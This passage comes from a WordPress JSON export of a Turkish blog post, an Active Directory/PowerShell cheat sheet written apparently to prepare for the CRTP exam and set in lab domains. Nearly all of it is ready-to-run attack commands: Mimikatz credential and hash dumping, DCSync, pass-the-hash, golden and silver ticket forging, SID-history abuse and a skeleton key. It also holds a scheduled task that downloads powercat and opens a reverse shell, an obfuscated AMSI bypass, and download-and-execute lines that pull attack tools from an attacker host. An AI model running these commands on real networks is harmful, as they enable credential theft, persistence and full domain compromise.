hklm\\sam filename1.hiv\nreg save hklm\\security filename2.hiv\nInvoke-Mimikatz -Command &#039;&quot;lsadump::sam filename1.hiv filename2.hiv&quot;&#039;\n#S\u0131ra PTH!\nls \\\\dc-01\\c$ #domain ismi yok \u00e7\u00fcnk\u00fc domain yok gibi d\u015f\u00fcnmeliyiz. DSRM ile yap\u0131yoruz.<\/code><\/pre>\n<p><strong>WMI without requiring administrator access(Set-RemoteWMI.ps1)<\/strong><\/p>\n<pre><code class=\"language-ps1\">#DC \u00fczerinde a\u015fa\u011f\u0131daki komut \u00e7al\u0131\u015ftr\u0131ld\u0131\u011f\u0131nda istenilen bir kullan\u0131c\u0131 i\u00e7in VMI access a\u00e7\u0131lacakt\u0131r. Bu durum kullan\u0131c\u0131n\u0131n silver ticket sald\u0131r\u0131s\u0131 ger\u00e7ekle\u015ftirmesine olanak sa\u011flar.\nSet-RemoteWMI -UserName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace &#039;root\\cimv2&#039; -Verbose\ngwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local\n#Kendime not: Bunu kesinlikle blogunda bir senaryo \u00fczerinde ger\u00e7ekle\u015ftir.<\/code><\/pre>\n<h2>SID History<\/h2>\n<p><strong>SID History K\u00f6t\u00fcye Kullanma()<\/strong><\/p>\n<pre><code class=\"language-ps1\">#Bu y\u00f6ntem sayesinde di\u011fer domain&#039;de CIFS servisini kullanabileceksin. \u00d6ncesinde mevcut bulundu\u011fun Domain&#039;de DC \u00fczerinde kod \u00e7al\u0131\u015ft\u0131rabilecek duruma gelmi\u015f olman gerekiyor.\n#\u015eimdi DC \u00fczerinde Trust&#039;lar\u0131 alal\u0131m\nInvoke-Mimikatz -Command &#039;&quot;lsadump::trust \/patch&quot;&#039;\n#Kendi domain&#039;inin ve kar\u015f\u0131 domain&#039;in SID&#039;leri al\nGet-DomainSID\nGet-DomainSID -Domain moneycorp.local\n#TGT olu\u015ftur\nInvoke-Mimikatz -Command &#039;&quot;kerberos::golden \/user:Administrator \/domain:dollarcorp.moneycorp.local \/sid:S-1-5-21-1874506631-3219952063-538504511 \/sids:S-1-5-21-280534878-1496970234-700767426-519 \/rc4:29b89128ea2f1f892633aff9a4f7a500 \/service:krbtgt \/target:mone\nycorp.local \/ticket:C:\\AD\\trust_tkt.kirbi&quot;&#039;\n#TGS olu\u015ftur\n.\\asktgs.exe C:\\AD\\trust_tkt.kirbi CIFS\/mcorp-dc.moneycorp.local\n#RAM&#039;e yaz\n.\\kirbikator.exe lsa .\\CIFS.mcorp-dc.moneycorp.local.kirbi\n#\u0130stismar et!\nls \\\\mcorp-dc.moneycorp.local\\c$<\/code><\/pre>\n<h2>Invoke-Mimikatz.ps1 komutlar\u0131<\/h2>\n<p><strong>Pass The Hash<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-Mimikatz -Command &#039;&quot;sekurlsa::pth \/user:svcadmin \/domain:dollarcorp.moneycorp.local \/ntlm:b38ff50264b74508085d82c69794a4d8 \/run:powershell.exe&quot;&#039;<\/code><\/pre>\n<p><strong>Pass The Ticket<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-Mimikatz -Command &#039;&quot;kerberos::ptt C:\\Users\\appadmin\\Documents\\userX\\[0;6f5638a]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi&quot;&#039;<\/code><\/pre>\n<p><strong>Domaindeki b\u00fct\u00fcn kullan\u0131c\u0131lar\u0131n, bilgisayarlar\u0131n ve trust keylerin NTLM hashleri (DC \u00dczerinde \u00e7al\u0131\u015f\u0131r)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-Mimikatz -Command &#039;&quot;lsadump::lsa \/patch&quot;&#039;<\/code><\/pre>\n<p><strong>Golden Ticket<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-Mimikatz -Command &#039;&quot;kerberos::golden \/User:Administrator \/domain:dollarcorp.moneycorp.local \/sid:S-1-5-21-1874506631-3219952063-538504511 \/krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 \/groups:512 \/startoffset:0 \/endin:600 \/renewmax:10080 \/ptt&quot;&#039;<\/code><\/pre>\n<p><strong>Silver Ticket<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-Mimikatz -Command &#039;&quot;kerberos::golden\n\/domain:dollarcorp.moneycorp.local \/sid:S-1-5-21-1874506631-3219952063-538504511 \/target:dcorp-dc.dollarcorp.moneycorp.local \/service:HOST \/rc4:731a06658bc10b59d71f5176e93e5710 \/user:Administrator \/ptt&quot;&#039;\n\n#Burada \u00f6nemli olan \/service k\u0131sm\u0131d\u0131r. \/service de\u011ferine g\u00f6re asl\u0131nda sizin yetkileriniz belirlenecektir. Bununla alakal\u0131 ayr\u0131nt\u0131l\u0131 bilgiyi blogumda paya\u015ft\u0131m. Direkt olarak PSSession da ba\u015flatabilirsiniz yada bir zamanlanm\u0131\u015f \u00f6revde olu\u015fturabilirsiniz.  \u00d6rne\u011fin yukar\u0131daki senaryo ile biz burada bir zamanlanm\u0131\u015f g\u00f6rev arac\u0131l\u0131\u011f\u0131 ile reverse shell almay\u0131 deneyece\u011fiz.\npowercat -l -v -p 443 -t 99999 #Dinleme noktam\u0131 ba\u015flatt\u0131m.\nschtasks.exe \/create \/S mcorp-dc.moneycorp.local \/SC Weekly \/RU &quot;NT Authority\\SYSTEM&quot; \/TN &quot;KUDAY4REVERSE&quot; \/TR &quot;powershell.exe -c &#039;iex (New-Object Net.WebClient).DownloadString(&#039;&#039;&#039;http:\/\/172.16.100.130\/powercat.ps1&#039;&#039;&#039;); powercat -c 172.16.100.130 443 -e cmd;&#039;&quot; #bir task olu\u015fturdum ve benim bilgisayar\u0131mdan powercat dosyas\u0131n\u0131 al\u0131p shell g\u00f6nderiyor.\nschtasks \/Run \/S mcorp-dc.moneycorp.local \/TN &quot;KUDAY4REVERSE&quot; \n#task&#039;\u0131 \u00e7al\u0131\u015ft\u0131r\u0131nca reverse gelir!\n<\/code><\/pre>\n<p><strong>Silver Ticket #2<\/strong><\/p>\n<pre><code>Servis Tipi: WMI\nService Silver Tickets: HOST, RPCSS\n\nServis Tipi: PowerShell Remoting\nService Silver Tickets: HOST, HTTP, WSMAN, RPCSS\n\nServis Tipi: WinRM\nService Silver Tickets: HOST, HTTP\n\nServis Tipi: Scheduled Tasks\nService Silver Tickets: HOST\n\nServis Tipi: Windows File Share (CIFS)\nService Silver Tickets: CIFS\n\nServis Tipi: LDAP operations including Mimikatz DCSync\nService Silver Tickets: LDAP\n\nServis Tipi: Windows Remote Server Administration Tools\nService Silver Tickets: RPCSS, LDAP, CIFS<\/code><\/pre>\n<p><strong>Skeleton Key<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-Mimikatz -Command &#039;&quot;privilege::debug&quot; &quot;misc::skeleton&quot;&#039;<\/code><\/pre>\n<p><strong>Extract the credentials from the SAM file from the DC<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-Mimikatz -Command &#039;&quot;token::elevate&quot; &quot;lsadump::sam&quot;&#039;<\/code><\/pre>\n<p><strong>Extract the credentials from the SAM file from the DC #2<\/strong><\/p>\n<pre><code class=\"language-ps1\">reg save hklm\\sam filename1.hiv\nreg save hklm\\security filename2.hiv\nInvoke-Mimikatz -Command &#039;&quot;lsadump::sam filename1.hiv filename2.hiv&quot;&#039;<\/code><\/pre>\n<p><strong>DCSYNC Sald\u0131r\u0131s\u0131<\/strong><\/p>\n<pre><code class=\"language-ps1\"> $acls = Invoke-ACLScanner -ResolveGUIDs | select *\n $acls | Where-Object {$_.IdentityReferenceName -match &quot;student130&quot; -and $_.ObjectDN -eq &quot;DC=dollarcorp,DC=moneycorp,DC=local&quot; } | select ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName\n#Kullan\u0131c\u0131n\u0131n replication yetkisi varsa, a\u015fa\u011f\u0131daki komut ile dcsync sald\u0131r\u0131s\u0131 yap\u0131labilir ve krbtgt hesab\u0131n\u0131n hash de\u011feri elde edilebilir.\n\nInvoke-Mimikatz -Command &#039;&quot;lsadump::dcsync \/user:dcorp\\krbtgt&quot;&#039;<\/code><\/pre>\n<p><strong>Biletleri D\u00f6k<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-Mimikatz -Command &#039;&quot;sekurlsa::tickets \/export&quot;&#039;<\/code><\/pre>\n<p><strong>Trust'lar\u0131 D\u00f6k<\/strong><\/p>\n<pre><code class=\"language-ps1\"> Invoke-Mimikatz -Command &#039;&quot;lsadump::trust \/patch&quot;&#039;<\/code><\/pre>\n<h2>Di\u011fer<\/h2>\n<p><strong>How to enable Remote Desktop<\/strong><\/p>\n<pre><code class=\"language-ps1\">Set-ItemProperty -Path &#039;HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server&#039; -name &quot;fDenyTSConnections&quot; -value 0\n<\/code><\/pre>\n<p><strong>Ba\u015fka bir kullan\u0131c\u0131yla powershell a\u00e7ma<\/strong><\/p>\n<pre><code class=\"language-ps1\"> $pw = convertto-securestring -AsPlainText -Force -String &lt;insert pw here&gt;\n $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist &quot;Domain\\User&quot;,$pw\n $session = new-pssession -computername &lt;computer&gt; -credential $cred<\/code><\/pre>\n<p><strong>Kullan\u0131c\u0131y\u0131 bir gruba ekleme<\/strong><\/p>\n<pre><code class=\"language-ps1\">net group &quot;Domain Admins&quot; testuser \/ADD \/DOMAIN<\/code><\/pre>\n<p><strong>DCSYNC Sald\u0131r\u0131s\u0131 \u0130\u00e7in Lab Ortam\u0131<\/strong><\/p>\n<pre><code>LAB \u0130\u00e7in DCSYNC Haklar\u0131nda Kullan\u0131c\u0131 Olu\u015fturma\n\n    \u2022 net user kuday Password1 \/ADD \/DOMAIN\n    \u2022 net localgroup &#039;Remote Management Users&#039; kuday \/add\n\nDaha sonras\u0131nda evil-winrm ile ba\u011flan:\n    \u2022 evil-winrm --ip 10.10.10.161 --user kuday --password Password1 --port 5985\n    \u2022 powershell -ep bypass\n    \u2022 sET-ItEM ( &#039;V&#039;+&#039;aR&#039; + &#039;IA&#039; + &#039;blE:1q2&#039; + &#039;uZx&#039; ) ( [TYpE]( &quot;{1}{0}&quot;-F&#039;F&#039;,&#039;rE&#039; ) ) ; ( GeT-VariaBle ( &quot;1Q2U&quot; +&quot;zX&quot; ) -VaL ).&quot;A`ss`Embly&quot;.&quot;GET`TY`Pe&quot;(( &quot;{6}{3}{1}{4}{2}{0}{5}&quot; -f&#039;Util&#039;,&#039;A&#039;,&#039;Amsi&#039;,&#039;.Management.&#039;,&#039;utomation.&#039;,&#039;s&#039;,&#039;System&#039; ) ).&quot;g`etf`iElD&quot;( ( &quot;{0}{2}{1}&quot; -f&#039;amsi&#039;,&#039;d&#039;,&#039;InitFaile&#039; ),( &quot;{2}{4}{0}{1}{3}&quot; -f &#039;Stat&#039;,&#039;i&#039;,&#039;NonPubli&#039;,&#039;c&#039;,&#039;c,&#039; )).&quot;sE`T`VaLUE&quot;( ${n`ULl},${t`RuE} )\n    \u2022 iex ((New-Object Net.WebClient).DownloadString(&#039;http:\/\/10.10.14.35:1111\/PowerView.ps1&#039;));\n    \u2022 Add-DomainObjectAcl -TargetIdentity &quot;DC=htb,DC=local&quot; -PrincipalIdentity kuday -Rights DCSync\n\nExploiting\n    \u2022 iex ((New-Object Net.WebClient).DownloadString(&#039;http:\/\/10.10.14.35:1111\/Invoke-Mimikatz.ps1 &#039;));\nInvoke-Mimikatz -Command &#039;&quot;lsadump::dcsync \/user:htb\\Administrator&quot;&#039;<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>B\u00fcy\u00fck g\u00fcne az kald\u0131! S\u0131nav\u0131ma girmeden \u00f6nce art\u0131k kendime baz\u0131 kopyalar \u00e7\u0131kart\u0131yorum ve s\u00fcrekli olarak bu sayfay\u0131 canl\u0131 tutmay\u0131 planl\u0131yorum. 1 ay \u00f6nce bu sayfay\u0131&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/01\/20\/active-directory-powershell-crtp-cheat-sheet\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Active Directory\/Powershell\/CRTP #Cheat Sheet<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,36,320],"tags":[],"class_list":["post-737","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-cheat-sheet","category-powershell","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/737","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=737"}],"version-history":[{"count":35,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/737\/revisions"}],"predecessor-version":[{"id":1841,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/737\/revisions\/1841"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=737"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=737"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=737"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}